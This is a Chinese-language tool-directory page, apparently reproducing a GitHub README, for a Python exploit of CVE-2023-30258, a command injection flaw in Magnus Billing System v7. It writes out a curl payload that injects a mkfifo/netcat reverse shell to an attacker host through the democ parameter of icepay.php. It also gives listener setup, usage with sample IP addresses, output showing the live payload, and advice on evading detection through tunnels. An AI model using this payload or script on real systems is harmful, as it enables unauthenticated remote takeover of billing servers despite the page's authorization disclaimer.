Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-30258-magnus-billing-v7-exploit — CVE-2023-30258 的自动化 Python 利用脚本,这是 Magnus Billing System v7 中的一个命令注入漏洞。发送精心构造的 GET 请求到 icepay.php,以执行任意命令并建立反向 Shell。 | Kitploit
工具/GitHubGitHub/tinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队
GitHubtinashelorenzi/cve-2023-30258-magnus-billing-v7-exploit

CVE-2023-30258-magnus-billing-v7-exploit

CVE-2023-30258 的自动化 Python 利用脚本,这是 Magnus Billing System v7 中的一个命令注入漏洞。发送精心构造的 GET 请求到 icepay.php,以执行任意命令并建立反向 Shell。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
711年前尚未审核
分享

Magnus Billing System v7 漏洞利用脚本

该 Python 脚本可自动化利用 Magnus Billing System v7 中的命令注入漏洞,该漏洞位于 /mbilling/lib/icepay/icepay.php 脚本的 icepay.php 中。利用程序通过 democ 参数在目标系统上执行任意命令,最终在攻击者控制的机器上建立反向 shell。

漏洞概述

该漏洞允许未认证的攻击者通过精心构造的 GET 请求进行命令注入。原始概念验证(PoC)使用了以下 curl 命令:

root@kitploit:~
curl -s 'http://<TARGET_IP>/mbilling/lib/icepay/icepay.php' --get --data-urlencode 'democ=;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ATTACKER_IP> <PORT> >/tmp/f;'

该脚本自动化了这一过程,并可通过命令行参数进行配置。

特性

  • 可配置:通过命令行参数指定目标 IP、攻击者 IP 和端口
  • 简单:使用 requests 库发送带有有效载荷的 HTTP 请求
  • 反馈:提供清晰的输出以跟踪利用程序的进度

先决条件

  • Python 3.x:确保系统已安装 Python 3
  • Requests 库:安装 requests Python 模块:
    root@kitploit:~
    pip install requests
    
  • Netcat:目标系统必须安装 netcat (nc) 才能使反向 shell 正常工作
  • 监听器:在攻击者机器上设置一个 netcat 监听器以接收反向 shell
  • 易受攻击的目标:目标必须运行 Magnus Billing System v7,并且可访问存在漏洞的 icepay.php 脚本

使用方法

设置

  1. 克隆或下载:将脚本保存为 exploit.py
  2. 设置监听器:在攻击者机器上启动一个 netcat 监听器:
    root@kitploit:~
    nc -lvnp <PORT>
    
    将 <PORT> 替换为你选择的端口(例如 443)

运行利用程序

root@kitploit:~
python exploit.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>

参数:

  • -t, --target:目标 Magnus Billing System 的 IP 地址
  • -a, --attacker:接收反向 shell 的你的 IP 地址
  • -p, --port:用于反向 shell 的你的机器端口

示例

root@kitploit:~
python exploit.py -t 10.10.160.86 -a 10.8.64.79 -p 443

预期输出:

root@kitploit:~
=== Magnus Billing System v7 Exploit ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.10.160.86/mbilling/lib/icepay/icepay.php
[+] Attacker: 10.8.64.79:443
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.64.79 443 >/tmp/f;
[+] Request sent successfully!
[*] Check your netcat listener (e.g., 'nc -lvnp 443') for a shell.
  1. 捕获 shell:切换到你的 netcat 监听器,如果成功即可与反向 shell 交互

技术说明

  • 有效载荷类型:该脚本使用基于 FIFO 的 mkfifo 反向 shell 和 netcat
  • 错误处理:包含基本的网络错误和无效端口检查
  • 调试:要查看服务器响应,请在 exploit() 函数中取消注释 print(response.text)
  • 替代有效载荷:如果需要,可以修改脚本以使用不同的反向 shell 有效载荷

故障排除

  • 如果连接失败,请验证:
    • 目标系统已安装 netcat
    • 没有防火墙阻止连接
    • 使用了正确的端口
    • 目标尚未打补丁

安全注意事项

  • 考虑使用 SSH 隧道或 VPN 来避免被检测
  • 该有效载荷可能触发安全监控系统

免责声明

此工具仅供 教育和安全测试目的 使用。请仅在你拥有明确测试权限的系统上使用。未经授权对你不拥有或未经同意测试的系统使用是非法且不道德的。作者不对任何滥用或由此脚本造成的损害负责。

许可证

本项目基于 MIT 许可证发布。欢迎根据需要修改和分发,但请保留免责声明。

贡献

欢迎贡献、提交错误报告和功能请求。请随时提交拉取请求或开启问题。

下载工具